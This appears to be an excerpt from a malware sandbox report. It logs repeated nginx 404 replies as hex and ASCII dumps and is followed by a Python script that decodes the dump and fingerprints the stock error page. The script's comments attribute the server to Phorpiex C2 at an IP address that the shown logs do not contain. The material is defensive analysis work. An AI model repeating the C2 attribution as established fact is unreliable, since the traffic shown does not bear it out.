                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:46 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
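The 404 replies above all carry the same 564-byte body. Before treating a "404" from a known Phorpiex host as a dead payload slot, it is worth confirming that the body really is the stock nginx error page and not a payload served with a misleading status line. The following added example (written for this page, not part of the Joe Sandbox report or of the malware) decodes the "Data Raw" hex exactly as the report prints it, checks the decoded length against the Content-Length the server advertised, and fingerprints the body: the advertised server banner and the six "padding to disable MSIE and Chrome friendly error page" comments that nginx appends to its built-in error pages. The hex constants are transcribed from the report; the padding block is written once and repeated six times because that is how many times it appears in the capture.

```python
import re

# Response body as the sandbox printed it under "Data Raw" for the 404
# replies from 185.215.113.66 (every reply in the report carries this same
# 564-byte body). Transcribed from the report; the padding comment is
# written once and repeated six times, as in the capture.
HEADER_HEX = (
    "3c 68 74 6d 6c 3e 0d 0a "
    "3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 "
    "3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a "
    "3c 62 6f 64 79 3e 0d 0a "
    "3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 "
    "3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a "
    "3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 "
    "28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a "
    "3c 2f 62 6f 64 79 3e 0d 0a "
    "3c 2f 68 74 6d 6c 3e 0d 0a "
)
PADDING_HEX = (
    "3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 "
    "20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 "
    "20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a "
)
DATA_RAW_HEX = HEADER_HEX + PADDING_HEX * 6
REPORTED_CONTENT_LENGTH = 564  # Content-Length header from the report

# The comment nginx appends to its built-in error pages so that browsers do
# not replace a short error body with their own "friendly" page.
NGINX_PADDING = b"<!-- a padding to disable MSIE and Chrome friendly error page -->"


def decode_data_raw(hex_text: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' dump (space-separated hex bytes) into bytes."""
    return bytes.fromhex("".join(hex_text.split()))


def fingerprint_nginx_404(body: bytes) -> dict:
    """Describe a response body: length, advertised server banner, number of
    nginx padding comments, and whether it looks like the stock nginx 404 page."""
    banner = re.search(rb"<hr><center>(.*?)</center>", body)
    padding = body.count(NGINX_PADDING)
    stock = (
        body.startswith(b"<html>\r\n<head><title>404 Not Found</title></head>\r\n")
        and banner is not None
        and banner.group(1).startswith(b"nginx/")
        and padding == 6
        and body.endswith(NGINX_PADDING + b"\r\n")
    )
    return {
        "length": len(body),
        "server": banner.group(1).decode() if banner else None,
        "padding_comments": padding,
        "stock_nginx_404": stock,
    }


def check_capture(hex_text: str, content_length: int) -> dict:
    """Decode the dump, compare it with the Content-Length the server sent,
    and fingerprint the body. A length mismatch, or a non-stock body behind a
    '404' status from a known C2, is the case that deserves a closer look."""
    body = decode_data_raw(hex_text)
    info = fingerprint_nginx_404(body)
    info["length_matches_header"] = info["length"] == content_length
    return info


if __name__ == "__main__":
    print(check_capture(DATA_RAW_HEX, REPORTED_CONTENT_LENGTH))
```

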